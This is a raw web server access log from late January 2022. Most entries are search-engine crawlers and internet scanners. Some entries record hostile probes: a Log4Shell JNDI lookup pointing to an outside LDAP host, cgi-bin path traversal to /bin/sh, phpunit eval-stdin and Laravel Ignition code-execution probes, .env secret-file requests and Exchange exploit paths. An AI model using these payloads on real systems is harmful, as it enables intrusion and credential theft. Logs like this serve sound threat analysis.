45.146.165.37 - - [29/Jan/2022:01:03:42 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 293 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 34.217.174.179 - - [29/Jan/2022:01:06:57 +0100] "GET / HTTP/1.1" 301 295 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 54.212.32.163 - - [29/Jan/2022:01:15:38 +0100] "GET / HTTP/1.1" 301 295 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 80.66.76.51 - - [29/Jan/2022:01:55:36 +0100] "GET /autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com HTTP/1.1" 301 347 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" 40.77.167.97 - - [29/Jan/2022:04:34:34 +0100] "GET /robots.txt HTTP/1.1" 301 311 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" 40.77.167.97 - - [29/Jan/2022:04:34:35 +0100] "GET /robots.txt HTTP/1.1" 301 311 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" 157.55.39.143 - - [29/Jan/2022:04:34:47 +0100] "GET / HTTP/1.1" 301 304 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" 131.220.6.152 - - [29/Jan/2022:04:54:41 +0100] "GET / HTTP/1.1" 301 295 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 128.14.134.170 - - [29/Jan/2022:05:08:49 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 98.0.242.10 - - [29/Jan/2022:05:17:28 +0100] "GET / HTTP/1.1" 301 383 "${jndi:ldap://185.8.172.132:1389/a}" "${jndi:ldap://185.8.172.132:1389/a}" 34.77.162.8 - - [29/Jan/2022:05:32:47 +0100] "GET / HTTP/1.1" 301 377 "-" "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" 64.62.197.122 - - [29/Jan/2022:06:06:46 +0100] "GET / HTTP/1.1" 301 383 "-" "-" 88.214.43.164 - - [29/Jan/2022:06:14:29 +0100] "GET /.env HTTP/1.1" 301 298 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 88.214.43.164 - - [29/Jan/2022:06:14:29 +0100] "POST /.env HTTP/1.1" 301 298 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 192.241.213.121 - - [29/Jan/2022:07:08:56 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 zgrab/0.x" 34.140.248.32 - - [29/Jan/2022:07:48:15 +0100] "GET / HTTP/1.1" 301 301 "-" "python-requests/2.27.1" 193.118.53.194 - - [29/Jan/2022:09:08:01 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 66.249.73.109 - - [29/Jan/2022:10:49:22 +0100] "GET /robots.txt HTTP/1.1" 301 304 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 66.249.73.109 - - [29/Jan/2022:10:49:23 +0100] "GET / HTTP/1.1" 301 297 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 192.241.211.102 - - [29/Jan/2022:10:53:03 +0100] "GET /owa/auth/x.js HTTP/1.1" 301 310 "-" "Mozilla/5.0 zgrab/0.x" 192.241.211.186 - - [29/Jan/2022:10:53:59 +0100] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 301 348 "-" "Mozilla/5.0 zgrab/0.x" 192.241.209.199 - - [29/Jan/2022:10:54:48 +0100] "GET /owa/auth/logon.aspx HTTP/1.1" 301 314 "-" "Mozilla/5.0 zgrab/0.x" 139.162.145.250 - - [29/Jan/2022:12:28:49 +0100] "GET /bag2 HTTP/1.1" 301 304 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)" 45.146.165.37 - - [29/Jan/2022:13:03:43 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 301 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 45.146.165.37 - - [29/Jan/2022:13:48:32 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 301 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 128.14.209.162 - - [29/Jan/2022:14:21:18 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 45.146.165.37 - - [29/Jan/2022:16:12:12 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 301 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 45.146.165.37 - - [29/Jan/2022:16:51:56 +0100] "POST /mifs/.;/services/LogService HTTP/1.1" 301 318 "https://86.59.113.102:443" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 45.146.165.37 - - [29/Jan/2022:17:07:12 +0100] "-" 408 - "-" "-" 45.146.165.37 - - [29/Jan/2022:17:56:52 +0100] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 301 315 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 178.239.21.164 - - [29/Jan/2022:18:31:54 +0100] "GET ///admin/config.php HTTP/1.1" 301 313 "-" "python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.el7.x86_64" 34.77.162.16 - - [29/Jan/2022:18:40:17 +0100] "GET / HTTP/1.1" 301 393 "-" "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" 45.146.165.37 - - [29/Jan/2022:19:11:34 +0100] "GET /_ignition/execute-solution HTTP/1.1" 301 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 45.146.165.37 - - [29/Jan/2022:19:43:46 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 45.146.165.37 - - [29/Jan/2022:20:18:58 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 92.118.160.13 - - [29/Jan/2022:20:35:13 +0100] "GET / HTTP/1.1" 301 377 "-" "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" 45.146.165.37 - - [29/Jan/2022:20:56:37 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 293 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 23.251.102.74 - - [29/Jan/2022:21:07:51 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 45.146.165.37 - - [29/Jan/2022:22:17:52 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 18.237.170.60 - - [29/Jan/2022:22:19:46 +0100] "GET / HTTP/1.1" 301 307 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 54.218.45.13 - - [29/Jan/2022:22:22:01 +0100] "GET / HTTP/1.1" 301 307 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 54.218.45.13 - - [29/Jan/2022:22:22:41 +0100] "GET / HTTP/1.1" 301 307 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 54.212.208.142 - - [29/Jan/2022:22:23:22 +0100] "GET / HTTP/1.1" 301 307 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 54.218.114.50 - - [29/Jan/2022:22:23:29 +0100] "GET /favicon.ico HTTP/1.1" 301 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 192.241.209.145 - - [29/Jan/2022:23:05:01 +0100] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 301 348 "-" "Mozilla/5.0 zgrab/0.x" 109.237.103.9 - - [29/Jan/2022:23:11:31 +0100] "GET /.env HTTP/1.1" 301 304 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 109.237.103.9 - - [29/Jan/2022:23:11:31 +0100] "POST /.env HTTP/1.1" 301 304 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 192.241.213.114 - - [29/Jan/2022:23:12:41 +0100] "GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/1.1" 301 335 "-" "Mozilla/5.0 zgrab/0.x" 138.246.253.24 - - [29/Jan/2022:23:40:26 +0100] "GET /robots.txt HTTP/1.1" 301 387 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" 165.22.40.179 - - [30/Jan/2022:00:59:15 +0100] "GET / HTTP/1.0" 301 379 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)"